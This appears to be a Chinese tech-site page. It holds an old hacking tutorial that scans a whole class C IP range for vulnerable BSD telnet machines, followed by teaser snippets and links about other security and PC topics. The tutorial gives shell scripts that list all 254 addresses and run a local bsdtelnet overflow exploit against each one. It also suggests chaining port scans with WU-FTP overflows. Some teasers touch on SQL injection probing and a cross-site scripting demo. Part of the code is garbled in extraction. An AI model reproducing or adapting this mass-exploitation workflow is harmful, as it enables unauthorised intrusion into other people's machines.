扫描实战 扫描C类IP里bsdtelnet漏洞机器
下面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:$cat num.cmain(){int x;for (x=0;x<256;x)printf num="">>num.txt来得到这个文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.
通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测,全部结束。
好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是WU-FTP260等,就可以再调用溢出程序进行测试呀等等.还是那句老话,技术最重要!作者:SysHunter
织梦教程:修复dedecms v5.5跨站漏洞的方法
影响版本:dedecmsCMS V5 5截止2010-03-18 17:50之前下载的所有版本,包含GBK和UTF-8版本漏洞描述:北洋贱队(http: bbs seceye org)首发demo1:http: www dedecms com plus search php?keyword=%22%3E%3Cifr
详情2018-01-17 12:20:47责编:llp 来源:驱动管家网络受到arp攻击怎么办?下面七种简单方法可以帮你快速解决
在局域网内,ARP攻击依然占有很高比例。众所周知,ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太
详情2018-01-23 18:20:29责编:llp 来源:驱动管家google搜索网址出现g.cn渐隐广告怎么办?
有时候,当你打开某个Google搜索网址的时候(例如:卡卡网速测试),会出现一个G cn的渐隐广告如下:咋一看,还以为中了病毒。每刷新一次搜索网址,就会出现一次这个广告。分析一下为什么会出现这个广告,当然是
详情2018-02-03 13:02:57责编:llp 来源:驱动管家2003年前discuz论坛所有免费版本存在没限制短消息发送次数的漏洞,怎么办?
Discuz论坛是由Crossday工作室开发的PHP论坛系统。作为一个论坛,Discuz的确速度一流。可是安全性还有待提高。涉及版本:目前(2003 9 21)所有免费版本(我没有商业版)描述:由于pm php发送消息那部分代码,缺乏对
详情2018-01-21 10:04:22责编:llp 来源:驱动管家隐藏在win xp的28个功能 哪个是你还没发现的?
Windows XP现在大家都在用了,不过,隐藏在它其中的秘密武器可不是人人都找得到,下面就让我带大家来寻找Win XP中的28个秘密武器。1、免费的系统教程(system32文件夹下)安装完windows xp后很想马上学习并体验
详情2018-03-08 16:49:14责编:llp 来源:驱动管家入侵php网站无法查询注入点怎么办?
闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习于是就判断是否存在注入点。and 1=1 and 1=2 返回不同。判断数据库是否大于4。0 。大于呵呵。可。。正当高行的时候
详情2018-03-04 09:47:12责编:llp 来源:驱动管家数据加密技术 动态加密的相关知识介绍
随着计算机和网络技术的飞速发展,越来越多的信息以电子形式存储在个人和商用电脑中,并且通过网络进行广泛地传递,在大量的信息存储和交换中,信息的安全问题越来越引起人们的重视。信息保密的理论基础是密码学
详情2018-02-09 12:23:03责编:llp 来源:驱动管家如何进入数据库抓包备份数据?入侵网站备份数据的方法
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest真实性毋庸置疑,希望给过。thanks地址(仅用于替代目标网站,非本站)又是
详情2018-02-13 15:04:06责编:llp 来源:驱动管家不能在windows服务项里手动停止rpc服务的停止方法
RPC(Remote Procedure Call, 远程过程调用)是操作系统的一种消息传递功能,微软的描述为:“一种能允许分布式应用程序调用网络上不同计算机的可用服务的消息传递实用程序。在计算机的远程管理期间使用” 。
详情2018-01-25 14:17:21责编:llp 来源:驱动管家企业网站的捷径处理方案导致企业网站存在安全风险
如今,很多企业(包括一些安全专家)都在处理安全问题时选择所谓的捷径,这种情况令人担忧。而产生这种现象的原因很多,比知道如企业希望少花钱多办事,攻击和反攻击技术的飞速进步,以及新媒体技术和厂商推出包含
详情2018-02-18 10:28:39责编:llp 来源:驱动管家
- MT.EXE34项功能 MT.EXE用法大全
- win10安装小米wifi客户端之后无法使用的解决方法
- 电脑主板上出现过的插槽都有哪些?电脑主板插槽介绍
- 影响笔记本性能的因素有哪些?关于电脑性能的一些介绍
- 索尼S13笔记本电脑3988元秒杀价
- B站作为一家流淌着年轻人热血的中国公司要在美国上市了
- 微软推出Windows人工智能平台Windows ML
- Win7鼠标停顿是怎么回事?Win7鼠标停顿的处理技巧
- 安装Win2003系统后服务器控制面板打不开怎么解决
- lumia 535渲染图 lumia 535配置怎么样?
- 诺基亚525上市时间和销售价格 诺基亚525怎么买?
- 如何彻底杜绝安装第三方软件时被捆绑?
- 最常见的电脑黑屏解析和处理方法
- 知道源码却不能执行命令或者报错怎么办?
- ring04h攻击事件 ring04h是什么?
- win10卸载内存驱动方法
- 显卡是什么?显卡基础知识大扫盲
- 现在装机划算吗?高性价比游戏电脑装机指南
- 微软小娜便利与隐患并存 黑客利用小娜对电脑进行攻击
- 腾讯董事会主席马化腾表示:微信活跃用户数全球超过10亿人